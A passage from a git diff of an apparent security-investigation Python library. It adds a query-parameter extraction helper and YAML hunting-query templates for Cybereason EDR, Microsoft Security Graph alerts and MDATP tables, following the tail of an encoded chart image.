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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}], 'tables': [{'columns': [{'heading': 'TenantId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'SourceSystem', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'yyyy-MMM-ddTHH:mm:ssZ', 'heading': 'TimeGenerated', 'order': -1, 'type': 8, 'compatible': 12}, {'heading': 'ResourceId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'OperationName', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'F1', 'heading': 'OperationVersion', 'order': -1, 'type': 1, 'compatible': 7}, {'heading': 'Category', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'F1', 'heading': 'ResultType', 'order': -1, 'type': 1, 'compatible': 7}, {'heading': 'ResultSignature', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ResultDescription', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'F1', 'heading': 'DurationMs', 'order': -1, 'type': 1, 'compatible': 7}, {'heading': 'CorrelationId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Resource', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ResourceGroup', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ResourceProvider', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Identity', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'F1', 'heading': 'Level', 'order': -1, 'type': 1, 'compatible': 7}, {'heading': 'Location', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'AppDisplayName', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'AppId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ClientAppUsed', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ConditionalAccessPolicies', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ConditionalAccessStatus', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'yyyy-MMM-ddTHH:mm:ssZ', 'heading': 'CreatedDateTime', 'order': -1, 'type': 8, 'compatible': 12}, {'heading': 'DeviceDetail', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Id', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'IPAddress', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'IsRisky', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'LocationDetails', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'RiskDetail', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'RiskLevelAggregated', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'RiskState', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'RiskLevelDuringSignIn', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'RiskEventTypes', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Status', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'UserDisplayName', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'UserId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'UserPrincipalName', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'AADTenantId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'ResourceDisplayName', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'OriginalRequestId', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Type', 'order': -1, 'type': 4, 'compatible': 4}, {'heading': 'Result', 'order': -1, 'type': 4, 'compatible': 4}, {'format': 'F1', 'heading': 'Latitude', 'order': -1, 'type': 1, 'compatible': 5}, {'format': 'F1', 'heading': 'Longitude', 'order': -1, 'type': 1, 'compatible': 5}], 'file': 'query_data.csv', 'index': 0, 'name': 'query_data', 'rows': 686, 'sets': []}]}
\ No newline at end of file
diff --git a/msticpy/data/param_extractor.py b/msticpy/data/param_extractor.py
new file mode 100644
index 000000000..313be8b45
--- /dev/null
+++ b/msticpy/data/param_extractor.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Parameter extractor helper functions for use with IPython/Juptyer queries."""
+from typing import List, Dict, Mapping, Tuple, Any
+
+from .query_store import QuerySource
+from ..common.utility import export
+from .query_defns import QueryParamProvider
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+def extract_query_params(
+    query_source: QuerySource, *args, **kwargs
+) -> Tuple[Dict[str, Any], List[str]]:
+    """
+    Get the parameters needed for the query.
+
+    Parameters
+    ----------
+    query_source : QuerySource
+        Query source
+    args : Tuple[QueryParamProvider]
+        objects that implement QueryParamProvider
+        (from which query parameters can be extracted).
+    kwargs : Dict[str, Any]
+        custom parameter list to populate queries
+        (override default values and values extracted
+        from QueryParamProviders).
+
+    Returns
+    -------
+    Tuple[Dict[str, Any], List[str]]
+        Dictionary of parameter names and values to be used
+        in the query.
+        List of any missing parameters
+
+    """
+    # get the parameters for this query
+    all_params = query_source.params
+
+    # required_params are those that don't have defaults set in the query
+    # template. Build a dictionary to hold the values. This will contain
+    # at least the required params plus any that are extracted from args and
+    # kwargs and have been added dynamically.
+    req_param_names = query_source.required_params.keys()
+    req_params: Dict[str, Any] = {param: None for param in req_param_names}
+
+    # try to retrieve any parameters as attributes of the args objects
+    _get_object_params(args, all_params, req_params)
+
+    # If any kwargs parameters have been supplied, add these.
+    # These any parameters obtained from _get_object_params
+    if kwargs:
+        resolved_params = query_source.resolve_param_aliases(kwargs)
+        req_params.update(
+            {key: arg for key, arg in resolved_params.items() if key in all_params}
+        )
+
+    # Get the names of any params that were required but we didn't
+    # find a value for
+    missing_params = [
+        p_name for p_name, p_value in req_params.items() if p_value is None
+    ]
+    return req_params, missing_params
+
+
+def _get_object_params(
+    args: Tuple[Any, ...], params: Mapping[str, Any], req_params: Dict[str, Any]
+):
+    """
+    Get params from attributes of arg objects.
+
+    Parameters
+    ----------
+    args : Tuple[Any]
+        Args list from calling function
+    params : Mapping[str, Dict[str, Any]]
+        The list of parameter names to look for
+    req_params : Dict[str, str]
+        Dictionary of required parameters
+
+    """
+    remaining_params = list(params.keys())
+    for arg_object in args:
+        if isinstance(arg_object, (str, int, float, bool)):
+            # ignore some common primitive types
+            continue
+        for param in remaining_params:
+            if isinstance(arg_object, QueryParamProvider):
+                if param in arg_object.query_params:
+                    req_params[param] = arg_object.query_params[param]
+            elif isinstance(arg_object, dict) and param in arg_object:
+                req_params[param] = arg_object.get(param, None)
+            elif hasattr(arg_object, param):
+                req_params[param] = getattr(arg_object, param)
+        remaining_params = [
+            p_name for p_name, p_value in req_params.items() if p_value is not None
+        ]
diff --git a/msticpy/data/queries/cybereason_connections.yaml b/msticpy/data/queries/cybereason_connections.yaml
new file mode 100644
index 000000000..d4be5451e
--- /dev/null
+++ b/msticpy/data/queries/cybereason_connections.yaml
@@ -0,0 +1,95 @@
+metadata:
+  version: 1
+  description: Cybereason Queries
+  data_environments: [Cybereason]
+  data_families:
+    - Connection
+  tags: ["edr", "connections"]
+defaults:
+  metadata:
+    data_source: "hunting_queries"
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+      default: -7
+    end:
+      description: Query end time
+      type: datetime
+      default: 0
+    timefield:
+      description: Field to use for time
+      type: str
+      default: creationTime
+    timeFeatureId:
+      description: Time boundary
+      type: str
+      default: startFeatureId
+    customFields:
+      description: List of fields to output
+      type: list
+      default:
+        - elementDisplayName
+        - direction
+        - ownerMachine
+        - ownerProcess
+        - serverPort
+        - serverAddress
+        - portType
+        - aggregatedReceivedBytesCount
+        - aggregatedTransmittedBytesCount
+        - remoteAddressCountryName
+        - dnsQuery
+        - accessedByMalwareEvidence
+        - domainName
+        - isExternalConnection
+        - remoteAddressInternalExternalLocal
+        - calculatedCreationTime
+        - endTime
+sources:
+  list_connections_from_process:
+    description: Search for process with a specific suspicion
+    metadata:
+    args:
+      query: |-
+        {{
+          "queryPath" : [
+              {{
+                  "requestedType": "Process",
+                  "filters":[
+                      {{
+                          "facetName": "applicablePid",
+                          "values":[ {pid} ],
+                          "filterType":"Equals"
+                      }},
+                      {{
+                          "facetName": "ownerMachine",
+                          "values":[ {hostname} ],
+                          "filterType":"Equals"
+                      }},
+                      {{
+                          "facetName": "{timefield}",
+                          "values": [ {start}, {end} ],
+                          "filterType":"Between"
+                      }}
+                  ],
+                  "connectionFeature": {{
+                    "elementInstanceType": "Process",
+                    "featureName": "connections"
+                  }}
+              }},
+              {{
+                  "requestedType": "Connection",
+                  "filters":[],
+                  "isResult": true
+              }}
+          ],
+          "customFields": [{customFields}]
+        }}
+    parameters:
+      pid:
+        description: Command to search for
+        type: list
+      hostname:
+        description: Hostname where the process is running
+        type: list
diff --git a/msticpy/data/queries/cybereason_hosts.yaml b/msticpy/data/queries/cybereason_hosts.yaml
new file mode 100644
index 000000000..bb5fbe410
--- /dev/null
+++ b/msticpy/data/queries/cybereason_hosts.yaml
@@ -0,0 +1,71 @@
+metadata:
+  version: 1
+  description: EDR Queries
+  data_environments: [Cybereason]
+  data_families:
+    - Host
+  tags: ["host"]
+defaults:
+  metadata:
+    data_source: "hunting_queries"
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+      default: -1
+    end:
+      description: Query end time
+      type: datetime
+      default: 0
+    timefield:
+      description: Field to use for time
+      type: str
+      default: creationTime
+    timeFeatureId:
+      description: Time boundary
+      type: str
+      default: startFeatureId
+    customFields:
+      description: List of fields to output
+      type: list
+      default:
+        - osVersionType
+        - platformArchitecture
+        - uptime
+        - isActiveProbeConnected
+        - lastSeenTimeStamp
+        - timeStampSinceLastConnectionTime
+        - mountPoints
+        - processes
+        - services
+        - elementDisplayName
+sources:
+  find_hosts:
+    description: Search for hosts by searching for a list of hostname
+    metadata:
+      pivot:
+        short_name: enrich
+        direct_func_entities:
+          - Dns
+    args:
+      query: |-
+        {{
+          "queryPath" : [
+              {{
+                  "requestedType": "Machine",
+                  "filters":[
+                      {{
+                          "facetName": "elementDisplayName",
+                          "values":[ {domain_list} ],
+                          "filterType":"MatchesToken"
+                      }}
+                  ],
+                  "isResult": true
+              }}
+          ],
+          "customFields": [{customFields}]
+        }}
+    parameters:
+      domain_list:
+        description: Hostnames to search for
+        type: list
diff --git a/msticpy/data/queries/cybereason_processes.yaml b/msticpy/data/queries/cybereason_processes.yaml
new file mode 100644
index 000000000..42704d2be
--- /dev/null
+++ b/msticpy/data/queries/cybereason_processes.yaml
@@ -0,0 +1,149 @@
+metadata:
+  version: 1
+  description: EDR Queries
+  data_environments: [Cybereason]
+  data_families:
+    - Process
+  tags: ["host"]
+defaults:
+  metadata:
+    data_source: "hunting_queries"
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+      default: -7
+    end:
+      description: Query end time
+      type: datetime
+      default: 0
+    timefield:
+      description: Field to use for time
+      type: str
+      default: creationTime
+    timeFeatureId:
+      description: Time boundary
+      type: str
+      default: startFeatureId
+    customFields:
+      description: List of fields to output
+      type: list
+      default:
+        - elementDisplayName
+        - creationTime
+        - endTime
+        - commandLine
+        - isImageFileSignedAndVerified
+        - imageFile.maliciousClassificationType
+        - productType
+        - children
+        - parentProcess
+        - ownerMachine
+        - calculatedUser
+        - imageFile
+        - imageFile.sha1String
+        - imageFile.md5String
+        - imageFile.companyName
+        - imageFile.productName
+        - executionPrevented
+        - isWhiteListClassification
+        - matchedWhiteListRuleId
+sources:
+  find_process_by_commandLine:
+    description: Search for process with a specific suspicion
+    metadata:
+    args:
+      query: |-
+        {{
+          "queryPath" : [
+              {{
+                  "requestedType": "Process",
+                  "filters":[
+                      {{
+                          "facetName": "commandLine",
+                          "values": [ "{command}" ],
+                          "filterType":"ContainsIgnoreCase"
+                      }},
+                      {{
+                          "facetName": "{timefield}",
+                          "values": [ {start}, {end} ],
+                          "filterType":"Between"
+                      }}
+                  ],
+                  "isResult": true
+              }}
+          ],
+          "customFields": [{customFields}]
+        }}
+    parameters:
+      command:
+        description: Command to search for
+        type: string
+  find_process_by_suspicions:
+    description: Search for process with a specific suspicion
+    metadata:
+    args:
+      query: |-
+        {{
+          "queryPath" : [
+              {{
+                  "requestedType": "Process",
+                  "filters":[
+                      {{
+                          "facetName": "{suspicion}",
+                          "values": [ true ],
+                          "filterType":"Equals"
+                      }},
+                      {{
+                          "facetName": "{timefield}",
+                          "values": [ {start}, {end} ],
+                          "filterType":"Between"
+                      }}
+                  ],
+                  "isResult": true
+              }}
+          ],
+          "customFields": [{customFields}]
+        }}
+    parameters:
+      suspicion:
+        description: Suspicion that the process should have
+        type: string
+  find_process_by_pid:
+    description: Search for a process by pid and hostname
+    metadata:
+    args:
+      query: |-
+        {{
+          "queryPath" : [
+              {{
+                  "requestedType": "Process",
+                  "filters":[
+                      {{
+                          "facetName": "applicablePid",
+                          "values":[ {pid} ],
+                          "filterType":"Equals"
+                      }},
+                      {{
+                          "facetName": "ownerMachine",
+                          "values":[ {hostname} ],
+                          "filterType":"ContainsIgnoreCase"
+                      }},
+                      {{
+                          "facetName": "{timefield}",
+                          "values": [ {start}, {end} ],
+                          "filterType":"Between"
+                      }}
+                  ],
+                  "isResult": true
+              }}
+          ],
+          "customFields": [{customFields}]
+        }}
+    parameters:
+      pid:
+        description: Process Id to search for
+        type: list
+      hostname:
+        description: Hostname where the process is running
+        type: list
diff --git a/msticpy/data/queries/graph_alerts.yaml b/msticpy/data/queries/graph_alerts.yaml
new file mode 100644
index 000000000..a26a2bbef
--- /dev/null
+++ b/msticpy/data/queries/graph_alerts.yaml
@@ -0,0 +1,185 @@
+metadata:
+  version: 1
+  description: Microsoft Security Graph Alert Queries
+  data_environments: [SecurityGraph]
+  data_families: [SecurityGraphAlert]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'graph_alert'
+  parameters:
+      path:
+        description: Path name
+        type: str
+        default: '/security/alerts'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end} {add_query_items}'
+      uri: None
+    parameters:
+  get_alert:
+    description: Retrieves a single alert by AlertId
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}/{alert_id}'
+    parameters:
+      alert_id:
+        description: 'The ID of the alert'
+        type: str
+      start:
+        description: Query start time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+      end:
+        description: Query end time
+        type: datetime
+        default: 0  # fake default to prevent this being viewed as required
+  list_alerts_for_user:
+    description: Retrieves list of alerts for a user account
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end}
+        and (userStates/any(d:tolower(d/userPrincipalName) eq tolower("{user_principal_name}")
+        or userStates/any(d:tolower(d/accountName) eq tolower("{account_name}"))
+        {add_query_items}'
+      uri: None
+    parameters:
+      user_principal_name:
+        description: 'The user principal name listed in the alert'
+        type: str
+        default: ''
+      account_name:
+        description: 'The user account name listed in the alert'
+        type: str
+        default: ''
+  list_alerts_for_ip:
+    description: Retrieves list of alerts for a IP Address
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end}
+        and (hostStates/any(d:d/privateIpAddress eq "{ip_address}")
+        or hostStates/any(d:d/publicIpAddress eq "{ip_address}")
+        or networkConnections/any(d:d/destinationAddress eq "{ip_address}")
+        or networkConnections/any(d:d/sourceAddress eq "{ip_address}"))
+        {add_query_items}'
+      uri: None
+    parameters:
+      ip_address:
+        description: 'The IP address listed in the alert'
+        type: str
+  list_alerts_for_host:
+    description: Retrieves list of alerts for a hostname or FQDN
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end}
+        and (hostStates/any(d:tolower(d/netBiosName) eq tolower("{host_name}")
+        or hostStates/any(d:startswith(tolower("{host_name}"), tolower(d/fqdn))))
+        {add_query_items}'
+      uri: None
+    parameters:
+      host_name:
+        description: 'The host name listed in the alert'
+        type: str
+  list_alerts_for_file:
+    description: Retrieves list of alerts for file name, path or hash
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end}
+        and (fileStates/any(d:tolower(d/fileHash/hashValue) eq tolower("{file_hash}")
+        or fileStates/any(d:tolower(d/name) eq tolower("{file_path}")
+        or (file_name neq "" and fileStates/any(d:endswith(tolower("{file_name}"), tolower(d/name)))))
+        {add_query_items}'
+      uri: None
+    parameters:
+      file_name:
+        description: 'The (unqualified) file name listed in the alert'
+        type: str
+        default: ''
+      file_hash:
+        description: 'The file hash listed in the alert'
+        type: str
+        default: ''
+      file_path:
+        description: 'The file path listed in the alert'
+        type: str
+        default: ''
+  list_related_alerts:
+    description: Retrieves list of alerts with a common entity
+    metadata:
+      data_source: 'graph_alert'
+    args:
+      query: '{path}?$filter=createdDateTime ge {start}
+        and createdDateTime le {end}
+        and (hostStates/any(d:d/privateIpAddress eq "{ip_address}")
+        or hostStates/any(d:d/publicIpAddress eq "{ip_address}")
+        or networkConnections/any(d:d/destinationAddress eq "{ip_address}")
+        or networkConnections/any(d:d/sourceAddress eq "{ip_address}")
+        or fileStates/any(d:tolower(d/fileHash/hashValue) eq tolower("{file_hash}")
+        or fileStates/any(d:tolower(name) eq tolower("{file_name}")
+        or hostStates/any(d:tolower(d/netBiosName) eq tolower("{host_name}")
+        or hostStates/any(d:startswith(tolower("{host_name}"), tolower(d/fqdn)))
+        or userStates/any(d:tolower(d/userPrincipalName) eq tolower("{user_principal_name}")
+        or userStates/any(d:tolower(d/accountName) eq tolower("{account_name}"))
+        {add_query_items}'
+      uri: None
+    parameters:
+      ip_address:
+        description: 'The host IP address listed in the alert'
+        type: str
+        default: ''
+      host_name:
+        description: The hostname to find
+        type: str
+        default: ''
+      process_name:
+        description: The process name to find
+        type: str
+        default: ''
+      user_principal_name:
+        description: 'The user principal name listed in the alert'
+        type: str
+        default: ''
+      account_name:
+        description: 'The user account name listed in the alert'
+        type: str
+        default: ''
+      file_name:
+        description: 'The file name listed in the alert'
+        type: str
+        default: ''
+      file_hash:
+        description: 'The file hash listed in the alert'
+        type: str
+        default: ''
diff --git a/msticpy/data/queries/kql_mdatp_alerts.yaml b/msticpy/data/queries/kql_mdatp_alerts.yaml
new file mode 100644
index 000000000..151b8e70c
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_alerts.yaml
@@ -0,0 +1,94 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATP]
+  tags: ["alert"]
+defaults:
+  metadata:
+    data_source: "security_alert"
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceAlertEvents"
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+    args:
+      query: "
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        {add_query_items}"
+      uri: None
+    parameters:
+  host_alerts:
+    description: Lists alerts by for a specified hostname
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where DeviceName has "{host_name}"
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  ip_alerts:
+    description: Lists alerts associated with a specified remote IP
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where RemoteIP has "{ip_address}"
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: Remote IP Address
+        type: str
+  url_alerts:
+    description: Lists alerts associated with a specified URL
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where RemoteUrl has "{url}"
+        {add_query_items}'
+    parameters:
+      url:
+        description: Remote URL
+        type: str
+  sha1_alerts:
+    description: Lists alerts associated with a specified SHA1 hash
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where SHA1 has "{file_hash}"
+        {add_query_items}'
+    parameters:
+      file_hash:
+        description: SHA1 hash
+        type: str
+        aliases:
+          - sha1
diff --git a/msticpy/data/queries/kql_mdatp_file.yaml b/msticpy/data/queries/kql_mdatp_file.yaml
new file mode 100644
index 000000000..c07ec821a
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_file.yaml
@@ -0,0 +1,70 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATP]
+  tags: ["file"]
+defaults:
+  metadata:
+    data_source: "file_events"
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceProcessEvents"
+    start:
+      description: Query start time
+      type: datetime
+    end:
